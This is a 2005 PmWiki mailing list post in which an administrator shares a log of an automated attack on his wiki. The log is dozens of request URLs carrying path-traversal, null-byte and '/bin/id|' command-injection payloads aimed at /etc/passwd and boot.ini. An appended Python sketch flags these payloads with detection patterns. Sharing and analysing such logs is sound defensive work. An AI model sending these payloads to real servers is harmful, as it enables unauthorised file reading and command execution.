[pmwiki-users] attack log
Tom Holroyd
tomh at kurage.nimh.nih.gov
Thu Mar 24 09:57:46 CST 2005
My wiki was attacked yesterday, unsuccessfully it seems, but the
attack was sufficiently strange that I thought I'd share. There's
megabytes of this in the logs -- it was apparently an automatic
attack, and I can't tell if it's targeting Windows or Linux or both.
Anyway, let's be aware -- one of PmWiki's strengths is its simplicity,
which makes it easier to secure. But the overall system can get
pretty funky, with PHP and Apache and cookbooks and other strange,
interacting stuff.
(Just the other day I discovered that one of my simple, seemingly
harmless HTML/PHP/MySQL forms was vulnerable to an SQL injection
attack, because the script was _too_ simple and didn't do proper
quoting/sanitizing of user input; the attacks below are hoping there
are similar problems in PmWiki.)
/meglab/User/Discussion?action=upload&upname=%00../../../../../../etc/passwd
HTTP Response 200
/meglab/Main/SearchWiki?action=/../../../../../../../../../../../boot.ini%00.html
HTTP Response 200
/meglab/Main/MegOverview?action=/../../../../../../../../../../etc/passwd
HTTP Response 200
/meglab?pagename=/../../../../../../../../../../../etc/passwd%00.html&q=FormFillText
HTTP Response 302
/meglab/Meg/References?action=/../../../../../../../../../../../boot.ini%00.jpg&restore=diff:1106002277:1106002259:minor
HTTP Response 200
/meglab/User/User?action=/../../../../../../../../../../../boot.ini%00&restore=diff:1107559271:1106022750:edit&restore=diff:1107559271:1106022750:'
HTTP Response 200
/meglab/Meg/Parsemarks2?action=/../../../../../../../../bin/id|&template=Software.Template
HTTP Response 200
/meglab/Meg/AFNIMaskCreation?action=/../../../../../../../../%2A
HTTP Response 200
/meglab/PmWiki/DocumentationIndex?action=%00../../../../../../etc/passwd
HTTP Response 200
/meglab/Meg/References?action=edit&restore=/../../../../../../../../../../../boot.ini%00
HTTP Response 200
/meglab/User/Meetings?action=edit&restore=/../../../../../../../../../../../boot.ini%00.html
HTTP Response 200
/meglab/User/Programming?action=diff&source=%00../../../../../../etc/passwd&minor=n
HTTP Response 200
/meglab/Meg/Meg?action=/../../../../../../../../bin/id|&upname=moo.txt
HTTP Response 200
/meglab/Profiles/Fred?action=/../../../../../../../../../../../boot.ini%00.jpg
HTTP Response 200
/meglab/Main/MegFacility?action=/../../../../../../../../bin/id|&source=n&minor=n
HTTP Response 200
/meglab/Meg/Parsemarks2?action=/../../../../../../../../../../../boot.ini%00&template=Software.Template
HTTP Response 200
/meglab/User/Meetings?action=/../../../../../../../../../../../etc/passwd%00.html&restore=diff:1111505282:1110827145:
HTTP Response 200
/meglab/Meg/Samslide?action=diff&source=n&minor=/../../../../../../../../bin/id|
HTTP Response 200
/meglab/Meg/ScriptingBasics?action=/../../../../../../../../%2A
HTTP Response 200
/meglab/Meg/Parsemarks2?action=/../../../../../../../../../../../boot.ini%00.html&template=Software.Template
HTTP Response 200
/meglab/Meg/Basics?action=/../../../../../../../../%2A&source=y&minor=y
HTTP Response 200
/meglab/Meg/Manuals?action=upload&upname=Variance%20Document.docupload&upname=/../../../../../../../../%2A
HTTP Response 200
/meglab/Main/OlderNews?action=edit&restore=%00../../../../../../etc/passwd
HTTP Response 200
/meglab/Meg/CTFSoftwareInstallation?action=/../../../../../../../../%2A&restore=diff:1109179963:1107550181:
HTTP Response 200
/meglab/Meg/SAMOutput?action=diff&source=n&minor=/../../../../../../../../../../../boot.ini
HTTP Response 200
/meglab/Meg/VirtualChannel?action=/../../../../../../../../../../../boot.ini%00.html
HTTP Response 200
/meglab/HandednessQuestionnaire/Doc?action=/../../../../../../../../%2A
HTTP Response 200
/meglab/User/PastMeetings?action=/../../../../../../../../../../../boot.ini%00&source=y&minor=y
HTTP Response 200
/meglab/PmWiki/PmWiki?action=diff&source=n&minor=%00../../../../../../etc/passwd
HTTP Response 200
/meglab/Meg/Megst?action=%00../../../../../../etc/passwd
HTTP Response 200
/meglab/Main/LabStatus?action=/../../../../../../../../%2A&restore=diff:1106004175:1106004175:
HTTP Response 200
/meglab/Meg/3dNormalize?action=diff&source=n&minor=/../../../../../../../../bin/id|
HTTP Response 200
/meglab/Main/MegFacility?action=diff&source=/../../../../../../../../../../etc/passwd^^&minor=n
HTTP Response 200
/meglab/Meg/RedHat8Install?action=edit&restore=/../../../../../../../../../../../etc/passwd%00.html
HTTP Response 200
/meglab/Main/AllRecentChanges?action=edit&restore=/../../../../../../../../../../../boot.ini
HTTP Response 200
/meglab/Main/HomePage?action=/../../../../../../../../../../../boot.ini&restore=diff:1110519104:1110457528:
HTTP Response 200
/meglab/Meg/VirtualChannels?action=/../../../../../../../../../../../boot.ini%00.jpg
HTTP Response 200
/meglab/Samslide/Py?action=/../../../../../../../../bin/id|
HTTP Response 200
/meglab/User/Quality?action=%00../../../../../../etc/passwd
HTTP Response 200
/meglab/Main/SearchWiki?action=diff&source=../../../../../../../../conf/server.xml&minor=n
HTTP Response 200
/meglab/Profiles/Tomh?action=/../../../../../../../../../../../boot.ini%00&source=n&minor=n
HTTP Response 200
/meglab/Meg/LocalSpheres?action=/../../../../../../../../../../../boot.ini%00
HTTP Response 200
/meglab/Meg/LocalSpheres?action=/../../../../../../../../../../../boot.ini%00.jpg
HTTP Response 200
/meglab/User/Discussion?action=edit&restore=/../../../../../../../../%2A
HTTP Response 200
/meglab/Flub/WikiWord?action=/../../../../../../../../../../etc/passwd
HTTP Response 200
/meglab/Main/SideBar?action=/../../../../../../../../../../../boot.ini%00.html
HTTP Response 200
/meglab/Meg/GroupAnalysis?action=/../../../../../../../../../../../etc/passwd%00.jpg
HTTP Response 200
/meglab/Meg/FrequentlyAskedQuestions?action=diff&source=n&minor=/../../../../../../../../bin/id|
HTTP Response 200
--
Dr. Tom Holroyd
"A man of genius makes no mistakes. His errors are volitional and
are the portals of discovery." -- James Joyce
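
A triage sketch for a log like the one above, added here as an example and not part of the original post: it URL-decodes each query parameter and tags the payload markers that appear in the listing, showing which parameters were probed and whether the probes aimed at Unix or Windows files. The tag names and the functions `classify` and `summarize` are illustrative; the sample requests are copied from the log, plus one constructed benign request.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Payload markers that appear in the log above (tag names are illustrative).
MARKERS = [
    ("traversal", re.compile(r"\.\./")),
    ("null-byte", re.compile(r"\x00")),            # %00 after URL-decoding
    ("unix-file", re.compile(r"etc/passwd")),
    ("windows-file", re.compile(r"boot\.ini", re.I)),
    ("command-pipe", re.compile(r"bin/id\|")),
    ("wildcard", re.compile(r"/\*$")),             # %2A after URL-decoding
]

def classify(request):
    """Map each query parameter carrying a probe to its sorted marker tags."""
    hits = {}
    for name, value in parse_qsl(urlsplit(request).query, keep_blank_values=True):
        tags = {tag for tag, rx in MARKERS if rx.search(value)}
        if tags:
            hits[name] = sorted(set(hits.get(name, [])) | tags)
    return hits

def summarize(requests):
    """Count marker tags and probed parameter names across a list of requests."""
    tags, params = Counter(), Counter()
    for request in requests:
        for name, found in classify(request).items():
            params[name] += 1
            tags.update(found)
    return tags, params

# Requests copied from the log above; the last one is a constructed benign request.
SAMPLE = [
    "/meglab/User/Discussion?action=upload&upname=%00../../../../../../etc/passwd",
    "/meglab/Main/SearchWiki?action=/../../../../../../../../../../../boot.ini%00.html",
    "/meglab/Meg/Parsemarks2?action=/../../../../../../../../bin/id|&template=Software.Template",
    "/meglab/Meg/AFNIMaskCreation?action=/../../../../../../../../%2A",
    "/meglab/Meg/Samslide?action=diff&source=n&minor=/../../../../../../../../bin/id|",
    "/meglab/Main/HomePage?action=edit",
]

if __name__ == "__main__":
    for request in SAMPLE:
        print(classify(request) or "clean", request.split("?")[0])
    tags, params = summarize(SAMPLE)
    print(dict(tags), dict(params))
```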